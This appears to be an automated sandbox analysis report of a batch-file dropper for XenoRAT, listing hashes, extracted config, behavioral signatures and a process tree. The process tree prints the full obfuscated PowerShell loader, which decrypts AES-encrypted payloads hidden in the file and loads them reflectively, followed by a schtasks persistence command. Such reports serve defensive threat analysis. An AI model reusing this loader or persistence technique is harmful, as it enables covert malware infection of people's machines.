Analysis
- max time kernel: 30s
- max time network: 11s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12-06-2024 22:23

Static task: static1
Behavioral task: behavioral1
Sample: sdsd.bat
Resource: win7-20240611-en

General
- Target: sdsd.bat
- Size: 399KB
- MD5: dedc70c320233bc67ceb02a9492f29d6
- SHA1: d031a05a302501a50581a2338762013f60da62df
- SHA256: c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a
- SHA512: 776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e
- SSDEEP: 6144:QpmLNVyxXtQ5MtZl5HaSAcfGoPTT5rYwZVYVwmmkcPW0oLCol6w1w/apK0/X0DC:Qga9t8Mt/HA4T9be9mfu0oZ6ziD/EG
Malware Config
Extracted: xenorat
- 127.0.0.1
- delay: 5000
- install_path: temp
- port: 7788
- startup_name: lol
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with the display window hidden.
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence check.
  sdsd.exe queried key value \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation
- Executes dropped EXE (2 IoCs)
  sdsd.exe (PID 1668), sdsd.exe (PID 4796)
- Drops file in System32 directory (1 IoC)
  svchost.exe opened C:\Windows\System32\Tasks\lol for modification
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies registry class (7 IoCs)
- Suspicious behavior: EnumeratesProcesses (37 IoCs)
  powershell.exe (PID 2032)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  powershell.exe (PID 2032): SeDebugPrivilege
  Explorer.EXE (PID 3428): SeShutdownPrivilege, SeCreatePagefilePrivilege
  svchost.exe (PID 2580), repeatedly: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- Suspicious use of WriteProcessMemory (63 IoCs)
  cmd.exe (PID 1048) wrote to memory of cmd.exe (PID 5040) and powershell.exe (PID 2032)
  powershell.exe (PID 2032) wrote to memory of Explorer.EXE (PID 3428), sdsd.exe (PID 1668) and svchost.exe PIDs 1120, 2556, 968, 4512, 964, 2300, 1736, 2320, 1460, 3300, 1920, 1520, 1604, 1908, 916, 1704, 1304, 1696, 1096, 4440, 2068, 3840, 1076, 1468, 3036, 1848, 948, 1644, 1840, 2428, 408, 60, 3604, 1828, 1232, 2608, 1620, 1220, 792, 4948, 4372, 2188, 2580, 2772, 1392, 2112, 2564
  sdsd.exe (PID 1668) wrote to memory of sdsd.exe (PID 4796)
  sdsd.exe (PID 4796) wrote to memory of schtasks.exe (PID 404)
  svchost.exe (PID 792) wrote to memory of wmiprvse.exe (PID 448)
Processes (indented by process tree depth; command line shown, image path noted where it differs)
- C:\Windows\system32\svchost.exe -k DcomLaunch -p
  signatures: Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\system32\svchost.exe -k RPCSS -p
- C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  signatures: Drops file in System32 directory
- C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
- C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
- C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\Explorer.EXE
  signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - "C:\Users\Admin\AppData\Local\Temp\sdsd.exe"
        signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of WriteProcessMemory
        - "C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"
          signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
          - "schtasks.exe" /Create /TN "lol" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp" /F (image: C:\Windows\SysWOW64\schtasks.exe)
            signatures: Creates scheduled task(s)
- C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
- "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3884,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:8
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sdsd.exe.log
  Filesize: 226B
  MD5: 916851e072fbabc4796d8916c5131092
  SHA1: d48a602229a690c512d5fdaf4c8d77547a88e7a2
  SHA256: 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
  SHA512: 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nttybbfr.51g.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\sdsd.exe
  Filesize: 45KB
  MD5: 41146957ad1a37a26565c42ac174609a
  SHA1: 622b3cd22edd11ba59ec438e14fe96d0c03d5026
  SHA256: 320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc
  SHA512: d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d
- C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp
  Filesize: 1KB
  MD5: 9ec91e3fb824c95fd8118ef24669988a
  SHA1: 5b6fe95c2a51b7ef0970c3b24844ece400e677ea
  SHA256: 45d3489cde25df745a4f071d83d83fc6d9daddc03b3a680a5c3010e844ae38f5
  SHA512: b898e3d16d77d672b7f5d2c32ff2a5fbc6f71d1be5ed12c2981cabd4ef90315b36512335a15d2c3cbe0bb24539b6ccd37ea1771521f9487f2d915c148fc02fc2